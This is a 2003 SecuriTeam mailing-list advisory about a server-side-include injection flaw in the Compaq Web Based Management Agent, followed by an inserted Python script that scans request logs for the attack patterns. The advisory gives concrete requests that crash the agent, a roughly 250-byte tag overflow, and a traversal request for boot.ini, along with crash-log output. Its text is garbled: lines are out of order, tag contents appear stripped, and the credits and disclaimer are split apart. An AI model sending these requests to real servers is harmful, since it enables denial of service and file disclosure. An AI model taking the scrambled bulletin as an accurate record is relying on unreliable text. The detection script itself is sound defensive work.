[NEWS] SSI Vulnerability in Compaq Web Based Management Agent
From: SecuriTeam (support_at_securiteam.com)
Date: 06/24/03
To: list@securiteam.com Date: 24 Jun 2003 18:41:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SSI Vulnerability in Compaq Web Based Management Agent
------------------------------------------------------------------------
SUMMARY
The Compaq Web Based Management Agent for Servers provides device
information for all managed subsystems and alerts for SNMP traps. The
agent has been found to contain a vulnerability that allows remote
attackers to cause the server to include arbitrary SSI in the response it
sends back to the user (allowing an attacker to execute these SSIs). At
the very least, these SSIs allow attackers to crash the agent and to
reveal the existence of files.
DETAILS
The Compaq Web Based Management Agent can run either on TCP port 2301
(HTTP) or 2381 (HTTPS). The agent uses "tags" to run functions at the
server side.
To list all tags:
To crash the agent:
http://IP:2301/survey/<!>
http://IP:2301/>
http://IP:2301/>
http://IP:2301/survey/>
http://IP:2301/>
http://IP:2301/>
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
Check file existence (with an 'input box'):
ADDITIONAL INFORMATION
The information has been provided by
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
http://IP:2301/>
http://IP:2301/<!>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Stack overflow (0xc00000fd), Address: 0x10039869
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Stack overflow (0xc00000fd), Address: 0x10039869
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Access violation (0xc0000005), Address: 0x100368a5
http://IP:2301/>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
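The request shapes shown in this advisory (a `<!` tag in the path, a tag of about 250 bytes, and a `Url` parameter carrying `..` path segments) can be matched in request logs for ports 2301 and 2381. The following Python detection check is an added example, not part of the original bulletin; the log format, the `MAX_TAG_LEN` threshold and the `TAG` placeholder name are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

AGENT_PORTS = {2301, 2381}  # HTTP and HTTPS ports named in the advisory
MAX_TAG_LEN = 128           # assumed threshold; the crash request carries ~250 bytes
TAG_RE = re.compile(r"<!([^>]*)")  # "<!" opens a tag, ">" (or end of path) closes it

def classify(target):
    """Return the findings for one request target (path plus optional query)."""
    path, _, query = target.partition("?")
    findings = []
    tags = TAG_RE.findall(unquote(path))  # decode first so %3C%21 is caught too
    if tags:
        findings.append("ssi-tag")
    if any(len(body) > MAX_TAG_LEN for body in tags):
        findings.append("oversized-tag")
    for name, values in parse_qs(query).items():  # parse_qs percent-decodes values
        if name.lower() == "url" and any(
            ".." in v.replace("\\", "/").split("/") for v in values
        ):
            findings.append("traversal-in-url")
    return findings

def scan(log_text):
    """Return (source, findings) for each suspicious request to an agent port."""
    hits = []
    for line in log_text.splitlines():
        src, port, request = line.split(" ", 2)
        if int(port) not in AGENT_PORTS:
            continue
        target = request.split(" ", 1)[1].rsplit(" ", 1)[0]  # drop method and version
        findings = classify(target)
        if findings:
            hits.append((src, findings))
    return hits

# Constructed sample, assumed format "<source> <dest port> <request line>".
SAMPLE_LOG = "\n".join([
    "192.0.2.10 2301 GET / HTTP/1.0",
    "192.0.2.44 2301 GET /survey/<!> HTTP/1.0",
    "192.0.2.44 2301 GET /<!.FunctionContentType=" + "A" * 250 + "> HTTP/1.0",
    "192.0.2.44 2381 GET /%3C%21TAG%3E?Url=%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.0",
    "192.0.2.10 80 GET /<!TAG> HTTP/1.0",
])

if __name__ == "__main__":
    for src, findings in scan(SAMPLE_LOG):
        print(src, ", ".join(findings))
```

Requests to other ports are skipped on purpose, so the last sample line produces no finding.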
<mailto:ian.vitek@as5-5-7.bi.s.bonet.se> Ian Vitek, the vulnerabilities
were discovered by Bashis.
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.